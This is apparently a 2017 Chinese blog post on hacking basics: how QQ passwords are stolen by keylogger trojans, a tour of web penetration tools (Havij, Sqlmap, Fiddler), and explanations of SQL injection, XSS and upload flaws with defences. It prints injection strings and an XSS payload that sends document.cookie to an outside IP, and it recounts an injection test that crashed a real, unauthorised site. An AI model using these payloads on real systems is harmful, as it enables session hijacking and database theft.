“哇，做IT的”，羡慕惊讶脸。

“嗯嗯......”，点头自豪脸。

“会不会盗QQ？......”，期待脸。

“......”，一脸懵逼。

首先声明一下，不是所有的IT从业者都会盗QQ好么，IT领域那么广，术业有专攻嘛。就算是hacker也有不同的方向的呐。

那还是先来简单聊一聊怎么盗吧。盗QQ就是黑进企鹅的数据库然后查看密码，游刃有余么？这未免想多了而且成本有点高。

条条道路通罗马，盗QQ的手法很多种，我们先绕开钓鱼页面（一般做成中奖消息登录窗口），仿造QQ登录器（一般是网吧），破解QQ邮箱，密码猜测等社工学手段，就hack而言，比较经典的手法就是上木马。方式之一是需要先把木马上到你的机器上（通过你点击的文件，链接或者网页自动植入安装，牛点的就直接攻电脑植入），注意这点很关键。当你执行登录的时候记录你的键盘密码输入按键行为，然后把密码通过木马程序发送到对方的指定位置（比如邮箱）。整个过程就是这么简单，但指定QQ号不是今天说盗就能立马盗的了的。

所以不明链接就别以为点下又不要钱就去瞎点了，还有特别是在网吧登QQ又不用软键盘的你就等于是赤裸裸的在狂奔（当然还有一种是直接检测密码记录文件的，这种的就算使用软键盘也是逃不过的）。

木马程序哪里拿？怎么设置？自行搜索找资源了，我也没有。^-^

聊完盗QQ我们进入正题吧。阅读以下内容前默认你已掌握一些基本的开发或者hack知识。

每一位hacker都不可能仅仅只会某一种攻击技术。攻击手段也多种多样，诸如暴库、弱口令攻击、内存溢出攻击、注入、DDOS、XSS、旁注等等。不同目的使用不同的攻击手法，就比如攻击主机和web站点是有区别的。但是只要能达到目的用什么手段都行，你扛着大刀架到目标管理员脖子上要到密码都算你赢（这在网安上应该属于社工学）。

对于WEB站点渗透而言，通常情况攻击流程为漏洞扫描，渗透，入侵，提权。当然hack是一个无所不用其极的工种，随机应变，没有固定公式可言。

先扫描站点漏洞，对扫描结果进行渗透验证是否确实存在漏洞，大多工具误报率还是蛮高的，确认漏洞后执行自动攻击或者手动攻击，很多工具都支持自动攻击，但是有些效果并没有手动好，就比如Havij的SQL自动注入对SQL语句拼接都注不进去，看着它能把你气死。一般入侵后上传木马后门，拿webshell，提权，完事。

下面分享几款WEB网站渗透工具供学习使用，有些是比较老了，有些是安全测试人员还在用，以下只分享使用心得，下载和教程有兴趣的自行找资源哈，需要的可以交流。必须提醒的是，使用前切记请先隐藏好自己（不是躲草丛），弄好代理或跳板，啊，呸，是先阅读好黑客精神和法则，以及遵守法律法规。

1.Safe3WVS

漏洞扫描工具，支持SQL注入，XSS跨站，上传漏洞，潜在漏洞等的扫描，扫描效果还行。

免费未破解版的只能支持SQL注入漏洞扫描码，存在误报。需要自行验证渗透。

上点图搞点气氛之Safe3WVS界面

2.Havij

是一款自动化的SQL注入工具,它能够帮助渗透测试人员发现和利用Web应用程序的SQL注入漏洞。

比如我们从上面的1软件扫描到SQL注入漏洞，直接把地址抓过来，执行自动注入，如果可注入成功底部将得到数据库的账号和基本信息。再进一步可直接获取表结构，表字段，列值，一条龙入侵数据库，获取管理员账号迅速快捷。确实非常方便好用，但是有一个不足，上面说了，自动注入有时候连SQL语句拼接的漏洞都搞不定。

上点图搞点气氛之Havij界面

3.Sqlmap

SQL渗透工具，个人认为最有效的工具。但是使用起来相对Havij来说不是很方便，非可视化操作，直接在cmd上干，敲命令操作。由python开发而成，安装需先安装python。

4.Fiddler

Fiddler是一个http协议调试代理工具，它能够记录并检查所有你的电脑和互联网之间的http通讯，设置断点，查看所有的“进出”Fiddler的数据（指cookie,html,js,css等文件，这些都可以让你胡乱修改的意思）。

可以用来抓包（抓包还是挺好用的），数据拦截分析，伪造数据报等。

当然它的附带插件很多支持XSS漏洞扫描：

X5s，需手动访问各个页面forms表单，然后手动替换注入代码验证漏洞，不是很便捷，用起来累不死你。

Watcher，分析当前URL包中存在安全漏洞问题，显示严重等级，当然也包含XSS漏洞。

ccXSScan，反射性XSS扫描，个人认为没什么效果的插件。

如果扫描到XSS漏洞直接可以payload，上传代码（一般利用的是存储型XSS漏洞），可执行自己定义的站外代码，如果COOKIE的会话标识未受保护，即可直接劫持，用于模拟用户登录（原理下文详解）。

上点图搞点气氛之Fiddler界面

hack工具很多，以上就简单介绍这么多吧。还有诸如著名的管理工具菜刀（必须要配合上传的木马使用，但用起来确实好用），DDOS工具LOIC（单部机器也只能算是个DOS），毁灭压力测试终极版（这个倒是真没有用过，看过一个视频效果还行，不过据说收费版才有用），敏感地址和后台地址扫描工具御剑（必须依赖字典库，感觉就像密码暴破的密码库一样，关键在库）等经典工具就不多说了。你可能认为HACK就是这么简单，用几个别人开发的工具点点就行了，那就有点尴尬了，这只能说就是平时所说的脚本小子。不建议只做脚本小子。

其实手注是一门更深的学问，才是内功。

什么？上面那些都看不懂在干嘛？那简单看看几个原理吧。以下默认你已掌握基本开发知识。

站在开发者的角度，对于WEB站点最通常也是最基本需要防御的安全漏洞：SQL注入，XSS，上传漏洞，命令执行注入，文件包含等等。

1.SQL注入

现在存在SQL注入漏洞的应该比较少了吧，大多数是比较老的站点，过滤比较弱。但是你拿工具去扫描一些站点，还是会报一大堆漏洞地址的，当然误报率还是挺高的。如果不爽就直接用1'  or  1=1或者'or'='or'等类似语句拼接一试便知。

曾经就对某站点做了这样一个测试（还没开始尝试渗透）：

上点图搞点气氛之注入登录提交

输入1'  or  1=1为用户名点击登录之后站点就崩溃了，怀疑是SQL语句拼接执行了导致查询全表数据资源耗尽导致，最近是加上了验证码（估计是以为被暴破了）。对输入再次亲测了下，数据也已经作了过滤处理，站长的反应还算蛮迅速的了。

原理大概就是，假如你写了一段登录判断的用户名密码SQL查询代码如下：

$sql="select * from test where name='".$_GET['username']."'and password='".$_GET['password']."'";

正常执行的语句是：

select * from test where name='lin'and password='123456';//查询用户名为lin密码为123456的用户。

如果注入成功，执行的的是：

select * from test where name='1'or'1=1'and password='123456';//查询用户名为1或者密码为123456的用户。如果处理结果是取数据返回的第一条后果可想而知。非法登录事小，联表拿数据，获取数据库权限都只是时间问题。

注入后拿webshell最简单流程：admin登录，上马，工具连接，拿到网站管理权限。

防御的手段基本就是，参数一定要过滤，转义，永远不要相信用户输入，还有注意不要直接拼接SQL语句。现在这种漏洞很少了，就PHP而言其本身的自动转义还有一些框架的过滤和转义做得很便捷了直接设置参数即可了。但这并不意味着就无孔不入了，这只是基本的防线而已。

2.XSS

XSS反射型和存储型，数存储型比较好利用。只要无意点击了事先植入的代码就直接执行了跨站代码，任其鱼肉，包括劫持COOKIE，模拟用户登录。其可以简单理解为：假设你的站点有一个评论表单提交，存在XSS漏洞，攻击者提交window.open('http://10.65.110.110/getcookie.php?msg='+document.cookie)代码提交，之后只要任何用户包括管理员访问页面点击到了这块隐藏代码，直接会触发请求http://10.65.110.110/getcookie.php?msg='+document.cookie，目标页面代码对接收的cookie获取并记录，完美劫持COOKIE，并使用代理抓包中断拦截，伪造cookie发送就可以无需密码以被劫持的用户身份登录了。

大多数扫描工具只扫描反射型的，而且不是很好用。不过手动的话直接alert(123)一试便知。

最基本的防御就是过滤，编码，PHP的htmlentities()函数html转实体就很好用（入库之前的处理），还要特别小心敏感标签和字符。还需要提的一点是COOKIE的会话标识很多站点都不是httponly的，如果站点不存在XSS漏洞还好，如果存在的话那么这个直接就是COOKIE劫持的绿色通道呀，比较危险。

什么意思呢？赶紧打开你的站点看看吧，如果你的站点COOKIE的会话身份标识PHPSESSID（PHP默认的是这个，名字是可改的）不为httponly，那么恭喜你，只能提醒你小心草丛！

处理还是比较简单的，如果是PHP语言可以配置文件配置下即可，其他的语言环境类似。

上点图搞点气氛之Firefox查看httponly

3.上传漏洞

最简单的就是上传的文件判断不够严谨导致木马进入目录，被执行，整站沦陷。PHPCMS早期的上传漏洞很经典了。

基本防御的话就是充分验证上传文件的类型，上传目录不要给执行权限。

还有DDOS攻击防御虽然更倾向于运维，但个人觉得对于开发人员应该也要懂得IPtables、负载均衡等这些最基本的防御降损策略吧。这种不讲道理的粗暴群殴向来比较难防，要成本，如果真遇上了，还是多找找发起的根源吧。当然，先不必惊慌，抑或可能也许是有新手正拿你的站点练手或者压测呢。^_^

使用阿里云的同学，只能说其自动安全检测很不错了，但完全依赖似乎也不行，机械化并且误报较高~^~。网安养兵千日用兵一时。就简单聊到这吧，网安其实是一个甚深的无底洞，上文皮毛而已。分享是一种快乐，也希望对有需要的朋友能有所帮助。有需要给帮忙作安检的站点也可以扔过来交流哈。

仅供用于技术学习，请遵循国家相关法律法规。

                                                  2017.7.1